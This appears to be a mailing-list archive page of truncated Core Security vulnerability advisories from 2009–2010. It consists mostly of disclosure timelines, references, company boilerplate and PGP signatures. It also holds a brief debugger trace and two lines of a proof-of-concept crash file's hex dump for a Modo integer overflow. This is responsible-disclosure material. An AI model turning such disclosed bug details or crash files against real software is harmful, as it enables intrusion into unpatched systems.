important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.14 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwWj7IACgkQyNibggitWa1e5ACgo5+9x+0d52kMcG/W+SUMQBi2 654AoJ5SFLW+h9mSS84bHqpzqhxBwhB0 =HDp/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0415] SQL Injection in CubeCart PHP Free Commercial Shopping Cart Application
, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwOjp4ACgkQyNibggitWa1hBQCcDtxBPpLuaYzZ+ACai/qdR0a9 4jMAn3bBbwBMJVVB6YbSfx7fJb/2lOL8 =mQtV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies Advisories Errata: The vulnerability in advisory CORE-2010-0405 was incorrectly described as an Invalid read, when it is really a Memory corruption vulnerability. Updated Title: Adobe Director DIRAPI.DLL Memory Corruption Vulnerability Updated URL: http://www.coresecurity.com/content/adobe-director-memory-corruption -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvsZboACgkQyNibggitWa20oQCgjqWZJeawrwtMs0E13rB4+veh F7MAn0WOo4rDimNR+jWhGErxrmjfK6U/ =iinS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
Arg2 = 0012F5EC 0012E6BC Arg3 = 0012E6C0 001A Arg4 = 001A 0012E6DC 2018BB23 JMP.DIRAPI.#88Director.2018BB1E 0012E83C 2027E776 ? Director.2018BAB0 Director.2027E771 - -/ 9. *Report Timeline* . 2010-04-14: Vendor contacted. . 2010-04-14: Vendor requests PoC file. . 2010-04-14: Core replies with the PoC file and the draft advisory. . 2010-04-14: Adobe replies that will investigate the issue and sets a preliminary release date for June/July. . 2010-04-15: Core agrees with the preliminary release date. . 2010-04-28: Core requests an update on the situation, and asks whether Adobe was able to confirm if the bug is exploitable. . 2010-04-28: Adobe replies that the issue was investigated and is scheduled to be fixed in the next release of Adobe Shockwave Player, planned for May; they did not carry out further exploitability research. . 2010-04-28: Core requests a specific publication date for the fix. . 2010-05-06: Adobe informs Core that the release date for the fix has been set to May 11th. . 2010-05-07: Core asks Adobe if they want to provide the text for the Solutions and Workarounds section of the advisory. . 2010-05-07: Adobe replies with the text for the Solutions and Workarounds section of the advisory. . 2010-05-11: Advisory published. 10. *References* [1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvptp4ACgkQyNibggitWa2lwACgo9oRhMUsmUe+IH3jdK9d7B+m ebMAn1iAO1mYBqXGrm67F2oCxTd+OEe3 =s6Ek -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0428] Microsoft Office Visio DXF File Insertion Buffer Overflow
, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvgbUoACgkQyNibggitWa3GTQCfT8WvlRzJ5JIs8aZV1YXoyGLB gQIAnRFEX6sGm6I5w+lCkxO642UzM0kf =++e0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0427] Windows SMTP Service DNS query Id vulnerabilities
-08-Kaminsky-DNS08-BlackOps.pdf] [9] Hubert, A., van Mook, R., Measures for Making DNS More Resilient against Forged Answers, RFC-5452, 2009. [http://tools.ietf.org/html/rfc5452] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkvgnyEACgkQyNibggitWa2SyQCfdWpNuMmlU8Ye1eE0uSII5f+G mmwAnj4hejHo/gnLh8qF/EhHBJHvvijS =VxJA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0406 - User Invoices Persistent XSS Vulnerability in CactuShop
://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkvPP5wACgkQyNibggitWa1yQgCgn+7/QWBsftCpgloXlQQMirnG jVAAoKs0PoyxVRtYCwzYyunWugg6grtl =E4Fs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0323: XSS Vulnerability in NextGEN Gallery Wordpress Plugin
-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAku7mowACgkQyNibggitWa3vfQCeP8eGzt/eGSrAREsNRfrGsaLs 8UEAnAuRs9cgmZkfeq1DU8BCNoxLgFFI =wL6j -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability
security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuf5fwACgkQyNibggitWa2IuwCeJitqH31/htKYFIuoeXVVbmmN lscAn1z+fpwqI7rbHnJbjRujiZ3mfJOJ =hgB9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0813: Windows Movie Maker and Microsoft Producer IsValidWMToolsStream() Heap Overflow
. . 2010-03-09: Microsoft Security Bulletin MS10-016 [2] is released, which fixes the vulnerability in Movie Maker. . 2010-03-09: The advisory CORE-2009-0813 is published as user release. 10. *References* [1] About Core Security's Bugweek http://corelabs.coresecurity.com/index.php?module=Wikiaction=viewtype=projectname=Bugweek [2] Microsoft Security Bulletin MS10-016 http://www.microsoft.com/technet/security/Bulletin/MS10-016.mspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuWvrcACgkQyNibggitWa1XQACeI3uhCN5nVjAjseSZpRh0R2Bn 0T4An2XAB94FkLyN0Pq5G3NWzOzM9Ibq =efAg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-1103: Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability
: The advisory CORE-2009-1103 is published. 10. *References* [1] Microsoft Security Bulletin MS10-017 http://www.microsoft.com/technet/security/Bulletin/MS10-017.mspx [2] MSDN DbOrParamQry entry http://msdn.microsoft.com/en-us/library/dd953289.aspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuWvzgACgkQyNibggitWa3sgQCfW9M7pPRWJ82ytbaY0V8rJh6W 3/4AmwQbyIyX8Lg2FPDrzetOCkgybb35 =HNzF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow
or ? ?R @ 01B0: 47 00 3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C G ?Ç B ?Ç CHNL 01C0: 00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21 ?bughere ?pnx! - -/ 8. *Report Timeline* . 2009-11-06: Core completes the support form trying to reach a security contact . 2009-11-13: Luxology LLC support team doesn't respond any mail. Core contacts CERT tring to reach a valid security contact at Luxology LLC. . 2009-11-16: CERT acknowledge the comunication, and Core reschedule the advisory to November 30th, 2009 based on CERT recomendations. . 2010-03-01: No response from Luxology LLC. . 2010-03-02: The advisory CORE-2009-0913 is published. 9. *References* [1] The authors participated in Core Bugweek 2009 as members of the team Gimbal Lock N Load. [2] http://www.luxology.com/modo/ [3] http://www.luxology.com/ [4] http://www.martinreddy.net/gfx/2d/IFF.txt 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuOmH0ACgkQyNibggitWa2QNgCfXfVi/vYAPK2u3xIBbkZ9sgbK CqEAoK7tSDlCbk9E2kmlID8BLK8itBKD =pxSB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Luxology Modo 401 .LXO Integer Overflow
00 00-43 48 4E 4C G ?Ç B ?Ç CHNL 01C0: 00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21 ?bughere ?pnx! - -/ 8. *Report Timeline* . 2009-11-06: Core completes the support form trying to reach a security contact . 2009-11-13: Luxology LLC support team doesn't respond any mail. Core contacts CERT tring to reach a valid security contact at Luxology LLC. . 2009-11-16: CERT acknowledge the comunication, and Core reschedule the advisory to November 30th, 2009 based on CERT recomendations. . 2009-03-01: No response from Luxology LLC. . 2009-03-02: The advisory CORE-2009-0913 is published. 9. *References* [1] The authors participated in Core Bugweek 2009 as members of the team Gimbal Lock N Load. [2] http://www.luxology.com/modo/ [3] http://www.luxology.com/ [4] http://www.martinreddy.net/gfx/2d/IFF.txt 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuNb5cACgkQyNibggitWa12/ACcC02DZ6CO4m4rGbtHxNTw97Xu D80Anjwp3e0eHeNHzEmRQr/zIS/vBFKK =FwUB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0827: Microsoft Office Excel / Word OfficeArtSpgr Container Pointer Overwrite Vulnerability
for the vulnerability MSRC 9368 in MSO.dll is still February 9th 2010 (the spreadsheet contained a clerical error). . 2010-02-01: Core requests MSRC the list of non vulnerable versions of Excel / Office, and a statement for the vendor information section of the advisory. . 2010-02-03: Microsoft sends the CVE identifier for the vulnerability, and the list of affected and non affected software. . 2010-02-09: The advisory CORE-2009-0827 is published. 10. *References* [1] About Core Security's Bugweek http://corelabs.coresecurity.com/index.php?module=Wikiaction=viewtype=projectname=Bugweek [2] Microsoft Security Bulletin MS10-003 http://www.microsoft.com/technet/security/bulletin/MS10-003.msp 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktxq9cACgkQyNibggitWa2ZfgCgsgImwlV9D+uNQnuzgmWefT8U BngAn06q1Ub1HhaqeKBigZaI3SCCPFg3 =Cmi1 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktsincACgkQyNibggitWa3Z5ACfYMSjRozwndnvWAldcCRo5W5C kUEAnjY2dmFWup/6s1GV9vALr3u1Wbfy =MTyQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities
/content/ie-security-zone-bypass [3] Understanding and Working in Protected Mode Internet Explorer. http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx [4] Protected Mode for IE7 in Windows Vista - Is it On or Off? http://blogs.msdn.com/ie/archive/2007/04/04/protected-mode-for-ie7-in-windows-vista-is-it-on-or-off.aspx [5] Jorge Luis Alvarez Medina, Abusing Insecure Feature of Internet Explorer, Feb. 2010 http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-article.pdf [6] Jorge Luis Alvarez Medina, Internet Explorer turns your personal computer into a public File Server, BlackHat Technical Security conference, Feb. 2010, Washington D.C., USA. http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-BHDC2010-Slides.pdf [7] Wikipedia, Trident (layout engine). http://en.wikipedia.org/wiki/Trident_(layout_engine) [8] Microsoft Security Bulletin MS09-019, Cumulative Security Update for Internet Explorer, June 10 2009. http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAktp59YACgkQyNibggitWa3e/ACfS+zHvcSqTFyJrqR6D1fTKk6O GoUAmQEk6qwbnHFaodbAhQOw8kaPtuTO =/WSE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Cisco Secure Desktop XSS/JavaScript Injection
1. *Advisory Information*
